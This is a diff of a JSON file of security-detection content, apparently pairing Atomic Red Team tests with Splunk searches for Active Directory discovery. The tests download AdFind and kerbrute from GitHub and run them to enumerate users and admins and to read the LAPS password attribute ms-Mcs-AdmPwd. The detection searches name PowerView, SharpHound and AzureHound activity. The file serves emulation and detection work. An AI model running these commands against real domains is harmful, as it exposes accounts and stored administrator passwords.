\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", "name": "command_prompt" } }, @@ -165333,12 +166141,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -sc admincountdmp\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc admincountdmp\n", "name": "command_prompt" } }, @@ -165353,12 +166161,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=person)\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=person)\n", "name": "command_prompt" } }, @@ -165373,12 +166181,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -sc exchaddresses\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc exchaddresses\n", "name": "command_prompt" } }, @@ -165512,17 +166320,17 @@ "dependencies": [ { "description": "kerbrute.exe must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe){exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"\n" + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"){exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"\n" }, { "description": "username text file must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\username.txt){exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\username.txt\"\n" + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\username.txt\"){exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\username.txt\"\n" } ], "executor": { - "command": "cd PathToAtomicsFolder\\..\\ExternalPayloads\n.\\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} PathToAtomicsFolder\\..\\ExternalPayloads\\username.txt", + "command": "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} \"PathToAtomicsFolder\\..\\ExternalPayloads\\username.txt\"", "name": "powershell" } }, @@ -165610,7 +166418,7 @@ } }, "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -h #{domain} -s subtree -f \"objectclass=computer\" *", + "command": "& \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -h #{domain} -s subtree -f \"objectclass=computer\" *\n", "cleanup_command": null, "name": "powershell", "elevation_required": false @@ -165631,7 +166439,7 @@ } }, "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -h #{domain} -s subtree -f \"objectclass=computer\" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime", + "command": "& \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -h #{domain} -s subtree -f \"objectclass=computer\" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime\n", "cleanup_command": null, "name": "powershell", "elevation_required": false @@ -166044,7 +166852,7 @@ { "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", "tags": { "name": "Detect AzureHound Command-Line Arguments", "analytic_story": [ @@ -166216,7 +167024,7 @@ { "name": "Detect AzureHound File Modifications", "description": "The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", "tags": { "name": "Detect AzureHound File Modifications", "analytic_story": [ @@ -166533,7 +167341,7 @@ { "name": "Detect SharpHound File Modifications", "description": "SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", "tags": { "name": "Detect SharpHound File Modifications", "analytic_story": [ @@ -166569,7 +167377,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -167658,15 +168466,13 @@ } }, { - "name": "Windows Linked Policies In ADSI Discovery", - "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain organizational unit for situational awareness and Active Directory Discovery.", - "search": "`powershell` EventCode=4104 ScriptBlockText = \"*[adsisearcher]*\" ScriptBlockText = \"*objectcategory=organizationalunit*\" ScriptBlockText = \"*findAll()*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_linked_policies_in_adsi_discovery_filter`", + "name": "Windows AD Abnormal Object Access Activity", + "description": "Windows Active Directory contains numerous objects. A statistically significant increase in access to these objects may be evidence of attacker enumeration of Active Directory.", + "search": "`wineventlog_security` EventCode=4662 | stats min(_time) AS firstTime, max(_time) AS lastTime, dc(ObjectName) AS ObjectName_count, values(ObjectType) AS ObjectType, latest(Computer) AS dest count BY SubjectUserName | eventstats avg(ObjectName_count) AS average stdev(ObjectName_count) AS standarddev | eval limit = round((average+(standarddev*3)),0), user = SubjectUserName | where ObjectName_count > limit | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_ad_abnormal_object_access_activity_filter`", "tags": { - "name": "Windows Linked Policies In ADSI Discovery", + "name": "Windows AD Abnormal Object Access Activity", "analytic_story": [ - "Data Destruction", - "Active Directory Discovery", - "Industroyer2" + "Active Directory Discovery" ], "asset_type": "Endpoint", "cis20": [ @@ -167675,18 +168481,481 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "powershell process having commandline $Message$ for user enumeration", + "message": "The account $user$ accessed an abnormal amount ($ObjectName_count$) of [$ObjectType$] AD object(s) between $firstTime$ and $lastTime$.", "mitre_attack_id": [ - "T1087.002", - "T1087" + "T1087", + "T1087.002" ], "nist": [ "DE.AE" ], "observable": [ { - "name": "Computer", - "type": "Hostname", + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows AD Privileged Object Access Activity", + "description": "Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should be rarely accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory.", + "search": "`wineventlog_security` EventCode=4662 ObjectName IN ( \"CN=Account Operators,*\", \"CN=Administrators,*\", \"CN=Backup Operators,*\", \"CN=Cert Publishers,*\", \"CN=Certificate Service DCOM Access,*\", \"CN=Domain Admins,*\", \"CN=Domain Controllers,*\", \"CN=Enterprise Admins,*\", \"CN=Enterprise Read-only Domain Controllers,*\", \"CN=Group Policy Creator Owners,*\", \"CN=Incoming Forest Trust Builders,*\", \"CN=Microsoft Exchange Servers,*\", \"CN=Network Configuration Operators,*\", \"CN=Power Users,*\", \"CN=Print Operators,*\", \"CN=Read-only Domain Controllers,*\", \"CN=Replicators,*\", \"CN=Schema Admins,*\", \"CN=Server Operators,*\", \"CN=Exchange Trusted Subsystem,*\", \"CN=Exchange Windows Permission,*\", \"CN=Organization Management,*\") | rex field=ObjectName \"CN\\=(?[^,]+)\" | stats values(Computer) as dest, values(object_name) as object_name, dc(ObjectName) as object_count, min(_time) as firstTime, max(_time) as lastTime, count by SubjectUserName | rename SubjectUserName as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ad_privileged_object_access_activity_filter`", + "tags": { + "name": "Windows AD Privileged Object Access Activity", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "The account $user$ accessed $object_count$ privileged AD object(s).", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "object_name", + "type": "Other", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 40, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Find Domain Organizational Units with GetDomainOU", + "description": "This analytic leverages PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Get-DomainOU` commandlet. `Get-DomainOU` is a component of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Identifying the use of `Get-DomainOU` is crucial as adversaries and Red Teams might employ it to gain insights into organizational units within Active Directory, potentially aiding in lateral movement or privilege escalation strategies.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Get-DomainOU*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_find_domain_organizational_units_with_getdomainou_filter`", + "tags": { + "name": "Windows Find Domain Organizational Units with GetDomainOU", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Get-DomainOU was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Find Interesting ACL with FindInterestingDomainAcl", + "description": "This analytic leverages PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Find-InterestingDomainAcl` commandlet. `Find-InterestingDomainAcl` is part of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Detecting the use of `Find-InterestingDomainAcl` is crucial as adversaries and Red Teams might employ it to identify unusual or misconfigured Access Control Lists (ACLs) within the domain. Such ACLs can provide attackers with insights into potential privilege escalation opportunities or weak security postures within Active Directory.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Find-InterestingDomainAcl*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_find_interesting_acl_with_findinterestingdomainacl_filter`", + "tags": { + "name": "Windows Find Interesting ACL with FindInterestingDomainAcl", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Find-InterestingDomainAcl was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Forest Discovery with GetForestDomain", + "description": "This analytic utilizes PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Get-ForestDomain` commandlet. `Get-ForestDomain` is a component of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Detecting the use of `Get-ForestDomain` is essential as adversaries and Red Teams might employ it to gain insights into the forest and domain configurations of an Active Directory environment. Such information can provide attackers with a broader understanding of the domain structure and potential avenues for lateral movement or privilege escalation.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Get-ForestDomain*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_forest_discovery_with_getforestdomain_filter`", + "tags": { + "name": "Windows Forest Discovery with GetForestDomain", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Get-ForestDomain was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Get Local Admin with FindLocalAdminAccess", + "description": "This analytic leverages PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Find-LocalAdminAccess` commandlet. `Find-LocalAdminAccess` is part of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Detecting the use of `Find-LocalAdminAccess` is vital as adversaries and Red Teams might employ it to identify machines where the current user context has local administrator access. Such information can provide attackers with potential targets for lateral movement or privilege escalation within the network.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Find-LocalAdminAccess*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_get_local_admin_with_findlocaladminaccess_filter`", + "tags": { + "name": "Windows Get Local Admin with FindLocalAdminAccess", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Find-LocalAdminAccess was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Linked Policies In ADSI Discovery", + "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain organizational unit for situational awareness and Active Directory Discovery.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*[adsisearcher]*\" ScriptBlockText = \"*objectcategory=organizationalunit*\" ScriptBlockText = \"*findAll()*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_linked_policies_in_adsi_discovery_filter`", + "tags": { + "name": "Windows Linked Policies In ADSI Discovery", + "analytic_story": [ + "Data Destruction", + "Active Directory Discovery", + "Industroyer2" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "powershell process having commandline $Message$ for user enumeration", + "mitre_attack_id": [ + "T1087.002", + "T1087" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "Computer", + "type": "Hostname", "role": [ "Victim" ] @@ -167802,6 +169071,197 @@ } ] } + }, + { + "name": "Windows Suspect Process With Authentication Traffic", + "description": "This analytic identifies executables running from public or temporary locations that are communicating over windows domain authentication ports/protocol. The ports/protocols include LDAP(389), LDAPS(636), and Kerberos(88). Authentications from applications running from user controlled locations may not be malicious, however actors often attempt to access domain resources after initial compromise from executables in these locations.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Traffic.process_id) as process_id from datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port IN (\"88\",\"389\",\"636\") AND All_Traffic.app IN (\"*\\\\users\\\\*\", \"*\\\\programdata\\\\*\", \"*\\\\temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\appdata\\\\*\", \"*\\\\perflogs\\\\*\") by All_Traffic.app,All_Traffic.src,All_Traffic.src_ip,All_Traffic.user,All_Traffic.dest,All_Traffic.dest_ip,All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rex field=app \".*\\\\\\(?.*)$\" | rename app as process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_suspect_process_with_authentication_traffic_filter`", + "tags": { + "name": "Windows Suspect Process With Authentication Traffic", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation" + ], + "message": "The process $process_name$ on $src$ has been communicating with $dest$ on $dest_port$.", + "mitre_attack_id": [ + "T1087", + "T1087.002", + "T1204", + "T1204.002" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "src", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" 